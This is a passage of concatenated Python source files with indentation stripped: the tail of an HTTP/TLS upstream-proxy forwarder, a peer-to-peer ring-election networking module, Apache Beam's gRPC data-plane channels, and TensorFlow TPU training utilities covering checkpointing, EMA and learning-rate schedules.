print "HTTP request from %s:%d for %s (%s %s)" % ((self.client_address) + (hostport, self.command, url))
length = int(self.headers.get('content_length', 0))
if length > 0:
data = self.rfile.read(length)
else:
data = None
self.headers['connection'] = 'close'
out_con = httplib.HTTPConnection(self.server.upstream_host, self.server.upstream_port)
out_con.putrequest(self.command, url, skip_host=1, skip_accept_encoding=1)
for hdr in self.headers.headers:
out_con._output(hdr.rstrip())
out_con.endheaders(data)
data_loop(self.request, out_con.sock)
self.request.close()
out_con.sock.close()
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
def start_tls_server(host, port, upstream_host, upstream_port):
server = ThreadedTCPServer((host, port), TLSTCPHandler)
server.allow_reuse_address = True
server.upstream_host = upstream_host
server.upstream_port = upstream_port
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
return server_thread, server
def start_http_server(host, port, upstream_host, upstream_port):
server = ThreadedTCPServer((host, port), HTTPHandler)
server.allow_reuse_address = True
server.upstream_host = upstream_host
server.upstream_port = upstream_port
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
return server_thread, server
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument('-l', '--listen', default='', help='Listening address (default: any)')
parser.add_argument('-p', '--port', type=int, help='Listening HTTP port (default: disable)')
parser.add_argument('-t', '--tlsport', type=int, help='Listening TLS port (default: disable)')
parser.add_argument('upstream_host', help='Upstream HTTP proxy host')
parser.add_argument('upstream_port', type=int, help='Upstream HTTP proxy port')
parser.add_argument('-V', '--version', action='version',
version='{} {}'.format(PROG_NAME, VERSION))
args = parser.parse_args()
servers = []
if args.tlsport:
tls_server_thread, tls_server = start_tls_server(args.listen, args.tlsport, args.upstream_host, args.upstream_port)
servers.append(tls_server)
if args.port:
http_server_thread, http_server = start_http_server(args.listen, args.port, args.upstream_host, args.upstream_port)
servers.append(http_server)
if servers:
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print "Interrupted"
for server in servers:
server.shutdown()
server.server_close()
|
network.py
|
from threading import Thread
from collections import defaultdict, deque
import socket
import socketserver
from ..constants import PORT, Headers, Roles
import json
class Request:
def __init__(self, message, address):
message = json.loads(message)
self.header = message['header']
self.data = message['data']
self.client_address = address
def __repr__(self):
return f'(addr: {self.client_address}, header: {self.header}, data: {self.data})'
class Message:
def __init__(self, header, data, address):
self.header = header
self.data = data
self.address = address
def get_message(self):
return json.dumps({
'header': self.header,
'data': self.data,
})
class Network:
"""Docstring
"""
peers = []
request_queue = deque()
hold_back_queue = defaultdict(list)
last_seq = defaultdict(lambda: 0)
group_clock = 0
is_connected = False
leader_uid = None
leader_address = None
role = Roles.FOLLOWER
participant = False
def __init__(self, address=(socket.gethostbyname(socket.gethostname()), PORT)):
self.address = address
print(f'Assigned address {address[0]}:{address[1]}!')
self._establish_connection()
self._start_servers()
self.host = self.address[0]
self.uid = self.get_uid(self.host)
self.peers.append(self.host)
def initiate_election(self):
neighbor = self.get_neighbor()
message = Message(Headers.LEADER_ELECTION, {}, neighbor)
message.data['uid'] = self.uid
message.data['leader_address'] = self.host
message.data['isLeader'] = (self.uid == self.leader_uid)
self.unicast(message)
print('Election Initiated...')
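# Ring election: each node forwards the election message to its neighbour,
# passing on the highest UID seen so far; when a node receives its own UID back
# it declares itself leader, and the result then circulates once more with
# isLeader set so every node learns the leader's UID and address.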
def resolve_election(self, request):
neighbor = self.get_neighbor()
new_message = Message(Headers.LEADER_ELECTION, {}, neighbor)
pb_uid = int(request.data['uid'])
if request.data['isLeader']:
new_message.data['uid'] = request.data['uid']
new_message.data['isLeader'] = request.data['isLeader']
new_message.data['leader_address'] = request.data['leader_address']
self.leader_uid = pb_uid
self.leader_address = request.data['leader_address']
self.participant = False
self.unicast(new_message)
elif pb_uid < self.uid and not self.participant:
new_message.data['uid'] = self.uid
new_message.data['isLeader'] = False
new_message.data['leader_address'] = request.data['leader_address']
self.participant = True
self.unicast(new_message)
elif pb_uid > self.uid:
new_message.data['uid'] = request.data['uid']
new_message.data['isLeader'] = request.data['isLeader']
new_message.data['leader_address'] = request.data['leader_address']
self.participant = True
self.unicast(new_message)
elif pb_uid == self.uid:
new_message.data['uid'] = self.uid
new_message.data['isLeader'] = True
new_message.data['leader_address'] = self.host
self.leader_uid = self.uid
self.leader_address = self.host
self.role = Roles.LEADER
self.participant = False
self.unicast(new_message)
def unicast(self, msg):
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
sock.connect((msg.address, PORT))
sock.sendall(bytes(msg.get_message(), 'utf-8'))
except socket.error as ex:
if msg.address in self.peers and msg.address != self.host:
self.peers.remove(msg.address)
if self.get_uid(msg.address) == self.leader_uid and not self.participant:
self.leader_uid = None
self.leader_address = None
self.initiate_election()
def multicast(self, msg):
if msg.data.get('group_clock') is None:
self.group_clock += 1
msg.data['group_clock'] = self.group_clock
broken_ip = self.address[0].split('.')
address = f'{broken_ip[0]}.{broken_ip[1]}.255.255'
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(bytes(msg.get_message(), 'utf-8'), (address, PORT))
def broadcast(self, msg):
broken_ip = self.address[0].split('.')
address = f'{broken_ip[0]}.{broken_ip[1]}.255.255'
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(bytes(msg.get_message(), 'utf-8'), (address, PORT))
def _establish_connection(self):
self.is_connected = True
def _start_servers(self):
if not self.is_connected:
raise Exception('Unexpected network behaviour.')
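# compare_and_push enforces per-sender FIFO ordering for GROUP_UPDATE messages:
# a message whose group_clock is the next expected sequence number is delivered
# to request_queue (followed by any held-back messages it unblocks); a message
# that arrives early is parked in hold_back_queue and a MSG_MISSING negative
# acknowledgement naming the next expected sequence number is unicast back to
# the sender. Non-group messages are delivered immediately.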
def compare_and_push(request):
# there is only one group.
if request.header == Headers.GROUP_UPDATE:
if self.last_seq[request.client_address] + 1 == request.data['group_clock']:
self.request_queue.append(request)
self.last_seq[request.client_address] += 1
# Clear the hold back queue here.
held_out = sorted(self.hold_back_queue[request.client_address], key=lambda x: x.data['group_clock'])
self.hold_back_queue[request.client_address].clear()
for req in held_out:
if self.last_seq[request.client_address] + 1 == req.data['group_clock']:
self.request_queue.append(req)
self.last_seq[request.client_address] += 1
else:
self.hold_back_queue[request.client_address].append(req)
neg_ack = Message(Headers.MSG_MISSING, { 'missed': self.last_seq[request.client_address] + 1 }, request.client_address)
self.unicast(neg_ack)
elif self.last_seq[request.client_address] < request.data['group_clock']:
self.hold_back_queue[request.client_address].append(request)
neg_ack = Message(Headers.MSG_MISSING, { 'missed': self.last_seq[request.client_address] + 1 }, request.client_address)
self.unicast(neg_ack)
else:
pass
else:
self.request_queue.append(request)
def udp_server():
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.bind(('', PORT))
while True:
request, address = sock.recvfrom(8192)
request = Request(request, address[0])
self.peers.append(request.client_address)
self.peers = list(set(self.peers))
compare_and_push(request)
class RequestHandler(socketserver.BaseRequestHandler):
def handle(this):
self.peers.append(this.client_address[0])
self.peers = list(set(self.peers))
request = Request(this.request.recv(8192), this.client_address[0])
self.request_queue.append(request)
self.tcp_server = socketserver.ThreadingTCPServer(self.address, RequestHandler)
Thread(target=udp_server).start()
Thread(target=self.tcp_server.serve_forever).start()
print('Servers up and running...')
def get_request(self):
if self.request_queue:
return self.request_queue.popleft()
else:
return None
def get_neighbor(self):
ring = sorted(self.peers, key=lambda x: self.get_uid(x))
return ring[ring.index(self.address[0]) - 1]
def get_peers(self):
return self.peers
def get_uid(self, address):
return int(''.join(address.split('.')))
def get_leader_uid(self):
return self.leader_uid
def set_leader_uid(self, uid):
self.leader_uid = uid
def get_leader_address(self):
return self.leader_address
def set_leader_address(self, leader_address):
self.leader_address = leader_address
def get_role(self):
return self.role
def disconnect(self):
self.tcp_server.shutdown()
|
data_plane.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of DataChannels for communicating across the data plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import logging
import Queue as queue
import sys
import threading
import grpc
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
# This module is experimental. No backwards-compatibility guarantees.
class ClosableOutputStream(type(coder_impl.create_OutputStream())):
"""A Outputstream for use with CoderImpls that has a close() method."""
def __init__(self, close_callback=None):
super(ClosableOutputStream, self).__init__()
self._close_callback = close_callback
def close(self):
if self._close_callback:
self._close_callback(self.get())
class DataChannel(object):
"""Represents a channel for reading and writing data over the data plane.
Read from this channel with the input_elements method::
for elements_data in data_channel.input_elements(instruction_id, targets):
[process elements_data]
Write to this channel using the output_stream method::
out1 = data_channel.output_stream(instruction_id, target1)
out1.write(...)
out1.close()
When all data for all instructions is written, close the channel::
data_channel.close()
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def input_elements(self, instruction_id, expected_targets):
"""Returns an iterable of all Element.Data bundles for instruction_id.
    This iterable terminates only once the full set of data has been received
for each of the expected targets. It may block waiting for more data.
Args:
instruction_id: which instruction the results must belong to
expected_targets: which targets to wait on for completion
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def output_stream(self, instruction_id, target):
"""Returns an output stream writing elements to target.
Args:
instruction_id: which instruction this stream belongs to
target: the target of the returned stream
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Closes this channel, indicating that all data has been written.
Data can continue to be read.
If this channel is shared by many instructions, should only be called on
worker shutdown.
"""
raise NotImplementedError(type(self))
class InMemoryDataChannel(DataChannel):
"""An in-memory implementation of a DataChannel.
This channel is two-sided. What is written to one side is read by the other.
  The inverse() method returns the other side of an instance.
"""
def __init__(self, inverse=None):
self._inputs = []
self._inverse = inverse or InMemoryDataChannel(self)
def inverse(self):
return self._inverse
def input_elements(self, instruction_id, unused_expected_targets=None):
for data in self._inputs:
if data.instruction_reference == instruction_id:
yield data
def output_stream(self, instruction_id, target):
def add_to_inverse_output(data):
self._inverse._inputs.append( # pylint: disable=protected-access
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
return ClosableOutputStream(add_to_inverse_output)
def close(self):
pass
class _GrpcDataChannel(DataChannel):
"""Base class for implementing a BeamFnData-based DataChannel."""
_WRITES_FINISHED = object()
def __init__(self):
self._to_send = queue.Queue()
self._received = collections.defaultdict(queue.Queue)
self._receive_lock = threading.Lock()
self._reads_finished = threading.Event()
self._closed = False
self._exc_info = None
def close(self):
self._to_send.put(self._WRITES_FINISHED)
self._closed = True
def wait(self, timeout=None):
self._reads_finished.wait(timeout)
def _receiving_queue(self, instruction_id):
with self._receive_lock:
return self._received[instruction_id]
def _clean_receiving_queue(self, instruction_id):
with self._receive_lock:
self._received.pop(instruction_id)
def input_elements(self, instruction_id, expected_targets):
"""
Generator to retrieve elements for an instruction_id
input_elements should be called only once for an instruction_id
Args:
instruction_id(str): instruction_id for which data is read
expected_targets(collection): expected targets
"""
received = self._receiving_queue(instruction_id)
done_targets = []
try:
while len(done_targets) < len(expected_targets):
try:
data = received.get(timeout=1)
except queue.Empty:
if self._exc_info:
            raise self._exc_info[0], self._exc_info[1], self._exc_info[2]
else:
if not data.data and data.target in expected_targets:
done_targets.append(data.target)
else:
assert data.target not in done_targets
yield data
finally:
      # Instruction ids are not reusable, so clean the queue once we are done
      # with an instruction_id.
self._clean_receiving_queue(instruction_id)
def output_stream(self, instruction_id, target):
# TODO: Return an output stream that sends data
# to the Runner once a fixed size buffer is full.
# Currently we buffer all the data before sending
# any messages.
def add_to_send_queue(data):
if data:
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
# End of stream marker.
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=''))
return ClosableOutputStream(add_to_send_queue)
def _write_outputs(self):
done = False
while not done:
data = [self._to_send.get()]
try:
# Coalesce up to 100 other items.
for _ in range(100):
data.append(self._to_send.get_nowait())
except queue.Empty:
pass
if data[-1] is self._WRITES_FINISHED:
done = True
data.pop()
if data:
yield beam_fn_api_pb2.Elements(data=data)
def _read_inputs(self, elements_iterator):
# TODO(robertwb): Pushback/throttling to avoid unbounded buffering.
try:
for elements in elements_iterator:
for data in elements.data:
self._receiving_queue(data.instruction_reference).put(data)
except: # pylint: disable=bare-except
if not self._closed:
logging.exception('Failed to read inputs in the data plane')
self._exc_info = sys.exc_info()
raise
finally:
self._reads_finished.set()
def _start_reader(self, elements_iterator):
reader = threading.Thread(
target=lambda: self._read_inputs(elements_iterator),
name='read_grpc_client_inputs')
reader.daemon = True
reader.start()
class GrpcClientDataChannel(_GrpcDataChannel):
"""A DataChannel wrapping the client side of a BeamFnData connection."""
def __init__(self, data_stub):
super(GrpcClientDataChannel, self).__init__()
self._start_reader(data_stub.Data(self._write_outputs()))
class GrpcServerDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataServicer, _GrpcDataChannel):
"""A DataChannel wrapping the server side of a BeamFnData connection."""
def Data(self, elements_iterator, context):
self._start_reader(elements_iterator)
for elements in self._write_outputs():
yield elements
class DataChannelFactory(object):
"""An abstract factory for creating ``DataChannel``."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def create_data_channel(self, remote_grpc_port):
"""Returns a ``DataChannel`` from the given RemoteGrpcPort."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcClientDataChannelFactory(DataChannelFactory):
"""A factory for ``GrpcClientDataChannel``.
Caches the created channels by ``data descriptor url``.
"""
def __init__(self):
self._data_channel_cache = {}
self._lock = threading.Lock()
def create_data_channel(self, remote_grpc_port):
url = remote_grpc_port.api_service_descriptor.url
if url not in self._data_channel_cache:
with self._lock:
if url not in self._data_channel_cache:
logging.info('Creating channel for %s', url)
grpc_channel = grpc.insecure_channel(
url,
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options=[("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)])
self._data_channel_cache[url] = GrpcClientDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataStub(grpc_channel))
return self._data_channel_cache[url]
def close(self):
logging.info('Closing all cached grpc data channels.')
for _, channel in self._data_channel_cache.items():
channel.close()
self._data_channel_cache.clear()
class InMemoryDataChannelFactory(DataChannelFactory):
"""A singleton factory for ``InMemoryDataChannel``."""
def __init__(self, in_memory_data_channel):
self._in_memory_data_channel = in_memory_data_channel
def create_data_channel(self, unused_remote_grpc_port):
return self._in_memory_data_channel
def close(self):
pass
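# --- Illustrative sketch (not part of the Beam data plane above) ---
# _write_outputs coalesces queued elements: it blocks for one item, then
# greedily drains up to 100 more without blocking, so each outgoing Elements
# message batches whatever has accumulated. The helper below mirrors that
# pattern on a plain queue; the name is hypothetical and for illustration
# only (it reuses the 'queue' module imported at the top of this file).
def _drain_in_batches(pending, sentinel, max_extra=100):
  done = False
  while not done:
    batch = [pending.get()]  # block until at least one item is available
    try:
      for _ in range(max_extra):
        batch.append(pending.get_nowait())
    except queue.Empty:
      pass
    if batch[-1] is sentinel:
      done = True
      batch.pop()
    if batch:
      yield batch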
|
common_utils.py
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=logging-format-interpolation
# pylint: disable=g-direct-tensorflow-import
r"""Common utils."""
import os
import re
import threading
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
def get_worker_name(worker_id):
"""Returns `/job:tpu_worker/task:{worker_id}`."""
return f'/job:tpu_worker/task:{worker_id}'
def get_device_name(worker_id, core_id):
"""Returns `/job:tpu_worker/task:{worker_id}/device:tpu:{core_id}`."""
return f'/job:tpu_worker/task:{worker_id}/device:TPU:{core_id}'
def count_params():
"""Count model params."""
num_params = sum([np.prod([d.value for d in w.shape])
for w in tf.trainable_variables()
if 'teacher' not in w.name.lower()])
return num_params
def strip_var_name(var_name):
"""Strips variable name of sub-strings blocking variable name matching.
Removes sub-strings that should be ignored when matching checkpointed variable
names to variable names in the training graph, namely:
- trailing colon + number, e.g. "W:0" --> "W"
- partitioning info., e.g. "/a/part_12/b" --> "a/b".
(Note that checkpointed variables do not have partitioning info in their name,
while model variables do).
Args:
var_name: str, variable name.
Returns:
stripped variable name.
"""
# Strip trailing number, e.g. convert "lstm/W_0:0" to "lstm/W_0".
var_name = re.sub(r':\d+$', '', var_name)
# Strip partitioning info, e.g. convert "W_0/part_3/Adagrad" to "W_0/Adagrad".
var_name = re.sub(r'/part_\d+', '', var_name)
return var_name
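# Hedged examples of strip_var_name (illustrative values only):
#   'lstm/W_0:0'       -> 'lstm/W_0'   (trailing ':<n>' removed)
#   'a/part_12/b/Adam' -> 'a/b/Adam'   (partitioning info removed)
assert strip_var_name('lstm/W_0:0') == 'lstm/W_0'
assert strip_var_name('a/part_12/b/Adam') == 'a/b/Adam'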
def get_saver(max_to_keep=1, restore_ema=False):
"""Constructs a `Saver`."""
var_list = {}
if restore_ema:
logging.info('Restore EMA values')
for v in tf.global_variables():
if v.name.startswith('ema'):
logging.fatal(f'wrong ema var name `{v.name}`')
if 'global_step' in v.name:
var_list['global_step'] = v
else:
var_list['ema/' + strip_var_name(v.name)] = v
else:
for v in tf.global_variables():
var_list[strip_var_name(v.name)] = v
saver = tf.train.Saver(var_list,
max_to_keep=max_to_keep,
save_relative_paths=True)
return saver
class AsyncCheckpoint(object):
"""Saves checkpoint using a separated thread."""
def __init__(self, saver, ckpt_dir, max_to_keep=None):
self._saver = saver
self._ckpt_dir = ckpt_dir
self._max_to_keep = max_to_keep
self._thread = None
self.latest_checkpoint = None
def join(self):
if self._thread is not None:
self._thread.join()
def save(self, sess, step):
"""Docs."""
def _save_fn():
"""Run the saver process."""
raw_sess = sess if isinstance(sess, tf.Session) else sess.raw_session()
ckpt_path = self._saver.save(
raw_sess,
save_path=os.path.join(self._ckpt_dir, 'ckpt'),
global_step=step,
write_meta_graph=False,
write_state=False)
self.latest_checkpoint = ckpt_path[len(self._ckpt_dir) + 1:]
logging.info(f'Saved checkpoint `{ckpt_path}`')
all_checkpoints = get_all_checkpoints(self._ckpt_dir)
assert all_checkpoints is not None
new_ckpt_content = [f'model_checkpoint_path: "{all_checkpoints[-1]}"']
if (self._max_to_keep is not None and
self._max_to_keep < len(all_checkpoints)):
pattern = all_checkpoints[0] + '*'
tf.io.gfile.BulkDelete(tf.io.gfile.Glob(pattern))
# pylint: disable=invalid-unary-operand-type
all_checkpoints = all_checkpoints[-self._max_to_keep:]
# pylint: enable=invalid-unary-operand-type
for ckpt_name in all_checkpoints:
new_ckpt_content.append(f'all_model_checkpoint_paths: "{ckpt_name}"')
checkpoint_file = os.path.join(self._ckpt_dir, 'checkpoint')
with tf.io.gfile.GFile(checkpoint_file, 'w') as fout:
fout.write('\n'.join(new_ckpt_content))
    if self._thread is not None:
      self._thread.join(timeout=0.1)
      if self._thread.is_alive():
        logging.info('Saver thread still in progress, skipping checkpoint.')
        return
self._thread = threading.Thread(target=_save_fn)
self._thread.start()
def should_log(params):
"""Returns a Boolean `tf.Tensor` dictating whether we should log values."""
global_step = tf.train.get_or_create_global_step()
first_run = tf.equal(global_step, 1)
log_every = tf.equal(tf.floormod(global_step, params.log_every), 0)
return tf.logical_or(first_run, log_every)
def get_all_checkpoints(ckpt_dir):
"""Returns a list of all checkpoints, eg `['ckpt-100', 'ckpt-500']`."""
if not tf.io.gfile.IsDirectory(ckpt_dir):
return []
pattern = ckpt_dir + '/ckpt-*'
s = len(ckpt_dir) + len('/ckpt-')
checkpoints = [int(f.split('.')[0][s:]) for f in tf.io.gfile.Glob(pattern)]
checkpoints = [os.path.join(ckpt_dir, 'ckpt-{0}'.format(v))
for v in sorted(set(checkpoints))]
return checkpoints
def get_latest_checkpoint(ckpt_dir):
"""Returns a list of all checkpoints, eg `['ckpt-100', 'ckpt-500']`."""
all_checkpoints = get_all_checkpoints(ckpt_dir)
all_checkpoints = [ckpt for ckpt in all_checkpoints if 'temp' not in ckpt]
if all_checkpoints:
return all_checkpoints[-1]
else:
return None
def get_outfeed_ops(params, signature):
"""Create TPU outfeed ops."""
outfeed_dtypes, outfeed_shapes = [], []
for dtype, shape in signature.values():
outfeed_dtypes.append(dtype)
outfeed_shapes.append(shape)
outfeed_ops = []
outfeed_graph = tf.Graph()
dev_assign = params.device_assignment
host_to_tpus = {}
for replica_id in range(params.num_replicas):
host_device = dev_assign.host_device(replica=replica_id, logical_core=0)
tpu_ordinal = dev_assign.tpu_ordinal(replica=replica_id, logical_core=0)
if host_device not in host_to_tpus:
host_to_tpus[host_device] = [tpu_ordinal]
else:
assert tpu_ordinal not in host_to_tpus[host_device]
host_to_tpus[host_device].append(tpu_ordinal)
with outfeed_graph.as_default():
for host, tpus in host_to_tpus.items():
with tf.device(host):
for device_ordinal in tpus:
device_outfeed = tf.raw_ops.OutfeedDequeueTuple(
dtypes=outfeed_dtypes,
shapes=outfeed_shapes,
device_ordinal=device_ordinal)
outfeed_ops.append(device_outfeed)
return outfeed_ops, outfeed_graph
class InfeedThread(object):
"""InfeedTread wrapper."""
def __init__(self, params, infeed_ops, infeed_graphs, name='infeed_thread'):
if infeed_graphs is not None:
assert isinstance(infeed_graphs, list)
assert len(infeed_graphs) == len(infeed_ops)
self.infeed_ops = infeed_ops
self.infeed_graphs = infeed_graphs
self.sessions = []
for g in infeed_graphs:
with g.as_default():
sess = tf.Session(target=params.master, graph=g)
self.sessions.append(sess)
self.name = name
self._threads = []
def stop(self):
self.join()
for sess in self.sessions:
sess.close()
def join(self):
for thread in self._threads:
if thread is not None:
thread.join(timeout=0.1)
del thread
def start(self, verbose=False):
"""Docs."""
if verbose:
logging.info(f'Start thread for `{self.name}`')
def _infeed_fn(sess, infeed_op, infeed_graph):
"""Run the infeed process."""
with infeed_graph.as_default():
sess.run(infeed_op)
for sess, op, g in zip(self.sessions, self.infeed_ops, self.infeed_graphs):
thread = threading.Thread(target=_infeed_fn, args=(sess, op, g))
thread.daemon = True
thread.start()
self._threads.append(thread)
class OutfeedThread(object):
"""OutfeedThread wrapper."""
def __init__(self, params, outfeed_ops, outfeed_graph, outfeed_signature,
name='outfeed_thread'):
self.params = params
self.outfeed_ops = outfeed_ops
self.outfeed_graph = outfeed_graph
self.outfeed_signature = outfeed_signature
with outfeed_graph.as_default():
self.session = tf.Session(target=params.master, graph=outfeed_graph)
self.name = name
self._thread = None
def join(self):
if self._thread is not None:
self._thread.join(timeout=0.1)
self._thread = None
self.session.close()
def start(self, verbose=False):
"""Docs."""
if verbose:
logging.info(f'Start thread for `{self.name}`')
if self._thread is not None:
return
params = self.params
outfeed_signature = self.outfeed_signature
def _outfeed_fn():
"""Read from `outfeed_dequeue` and write `Summary`."""
train_logdir = os.path.join(params.output_dir, 'logs', 'train')
summary_writer = tf.summary.FileWriter(train_logdir)
summary_tags = list(outfeed_signature.keys())
while True:
outfeeds = self.session.run(self.outfeed_ops)
outfeeds = np.array(outfeeds).reshape([params.num_replicas, -1])
outfeeds = np.sum(outfeeds, axis=0).tolist()
summary_values = []
for tag, value in zip(summary_tags, outfeeds):
if tag == 'global_step':
value /= params.num_replicas
step = value
else:
summary_values.append(tf.Summary.Value(tag=tag, simple_value=value))
summary_writer.add_summary(tf.Summary(value=summary_values), step)
summary_writer.flush()
if step >= params.num_train_steps:
summary_writer.close()
break
self._thread = threading.Thread(target=_outfeed_fn)
self._thread.daemon = True
self._thread.start()
def setup_ema(params, name_scope=None):
"""Create exponential moving average for all variables under `name_scope`."""
logging.info(f'ema_decay with rate {params.ema_decay}')
all_vars = tf.global_variables()
ema_ops = []
step = tf.cast(tf.train.get_or_create_global_step() - params.ema_start,
tf.float32)
decay = 1. - tf.minimum(params.ema_decay, (step+1.) / (step+10.))
decay = tf.cond(tf.train.get_or_create_global_step() < params.ema_start,
lambda: tf.constant(1, tf.float32), lambda: decay)
def should_skip(v):
key_words = ['momentum', 'rms', 'global_step', 'debug', 'adam', 'lars']
conditions = [k in v.name.lower() for k in key_words]
if name_scope is not None:
conditions += [not v.name.lower().startswith(name_scope)]
return any(conditions)
def get_init(v_name):
key_words = ['variance', 'beta']
if any([k in v_name for k in key_words]):
return tf.initializers.ones()
return tf.initializers.zeros()
with tf.variable_scope('ema'):
for v in all_vars:
if not should_skip(v):
v_name = strip_var_name(v.name)
with tf.device(v.device):
ema_var = tf.get_variable(
name=v_name,
shape=v.shape.as_list(),
initializer=get_init(v_name),
trainable=False)
ema_op = tf.assign_sub(ema_var, decay * (ema_var-v), use_locking=True)
ema_ops.append(ema_op)
ema_op = tf.group(*ema_ops)
return ema_op
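# Hedged, pure-Python sketch of the update fraction used in setup_ema above:
#   decay = 1 - min(ema_decay, (step + 1) / (step + 10))
# Early steps use a large update fraction (0.9 at step 0) so the shadow
# variables track quickly; late steps settle at 1 - ema_decay. The helper name
# is hypothetical and exists only for this illustration.
def _ema_update_fraction(step, ema_decay):
  return 1.0 - min(ema_decay, (step + 1.0) / (step + 10.0))
# e.g. with ema_decay=0.999: step 0 gives 0.9, very large steps give ~0.001.
assert abs(_ema_update_fraction(0, 0.999) - 0.9) < 1e-9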
def get_session(params, isolate_session_state=True):
"""Builds and returns a `tf.Session`."""
config = tf.ConfigProto(
isolate_session_state=isolate_session_state,
allow_soft_placement=True,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=False,
do_function_inlining=False,
do_constant_folding=False)))
return tf.Session(target=params.master, config=config)
def get_learning_rate(params, initial_lr=None, num_warmup_steps=None,
num_wait_steps=None):
"""Build learning rate."""
global_step = tf.train.get_or_create_global_step()
if initial_lr is None:
initial_lr = params.lr
initial_lr = initial_lr * params.train_batch_size / 256.
if num_warmup_steps is None:
num_warmup_steps = params.num_warmup_steps
if num_wait_steps is not None:
global_step = global_step - num_wait_steps
if params.lr_decay_type == 'constant':
lr = tf.constant(initial_lr, dtype=tf.float32)
elif params.lr_decay_type == 'exponential':
lr = tf.train.exponential_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_decay_steps,
decay_rate=params.lr_decay_rate,
staircase=True)
elif params.lr_decay_type == 'cosine':
if num_wait_steps is None:
lr = tf.train.cosine_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_train_steps-num_warmup_steps,
alpha=0.0)
else:
lr = tf.train.cosine_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_train_steps-num_warmup_steps-num_wait_steps,
alpha=0.0)
else:
raise ValueError(f'Unknown lr_decay_type `{params.lr_decay_type}`')
r = (tf.cast(global_step+1, tf.float32) /
tf.cast(num_warmup_steps, tf.float32))
warmup_lr = initial_lr * r
lr = tf.cond(global_step < num_warmup_steps, lambda: warmup_lr, lambda: lr)
if num_wait_steps is not None:
lr = tf.cond(global_step < 0,
lambda: tf.constant(0., tf.float32), lambda: lr)
return lr
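# Hedged, pure-Python sketch of the warmup behaviour in get_learning_rate
# above for the 'constant' decay type (ignoring the batch-size scaling of
# initial_lr): before num_warmup_steps the rate ramps linearly as
# initial_lr * (step + 1) / num_warmup_steps, afterwards it stays at
# initial_lr. The helper name is hypothetical, for illustration only.
def _constant_lr_with_warmup(step, initial_lr, num_warmup_steps):
  if step < num_warmup_steps:
    return initial_lr * float(step + 1) / num_warmup_steps
  return initial_lr
# e.g. initial_lr=0.1 with 10 warmup steps: step 4 gives 0.05, step 20 gives 0.1.
assert abs(_constant_lr_with_warmup(4, 0.1, 10) - 0.05) < 1e-9
assert _constant_lr_with_warmup(20, 0.1, 10) == 0.1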
def get_optimizer(params, learning_rate=None):
"""Build optimizer."""
if learning_rate is None:
learning_rate = get_learning_rate(params)
if params.optim_type.lower() == 'sgd':
logging.info('Use SGD')
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate,
use_locking=True)
elif params.optim_type.lower() == 'momentum':
logging.info('Use Momentum')
optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate,
momentum=0.9,
use_nesterov=True,
use_locking=True)
elif params.optim_type.lower() == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(learning_rate=learning_rate,
decay=params.rmsprop_rho,
momentum=params.rmsprop_momentum,
epsilon=params.rmsprop_epsilon,
use_locking=True)
elif params.optim_type.lower() == 'lars':
class LARSOptimizer(tf.train.Optimizer):
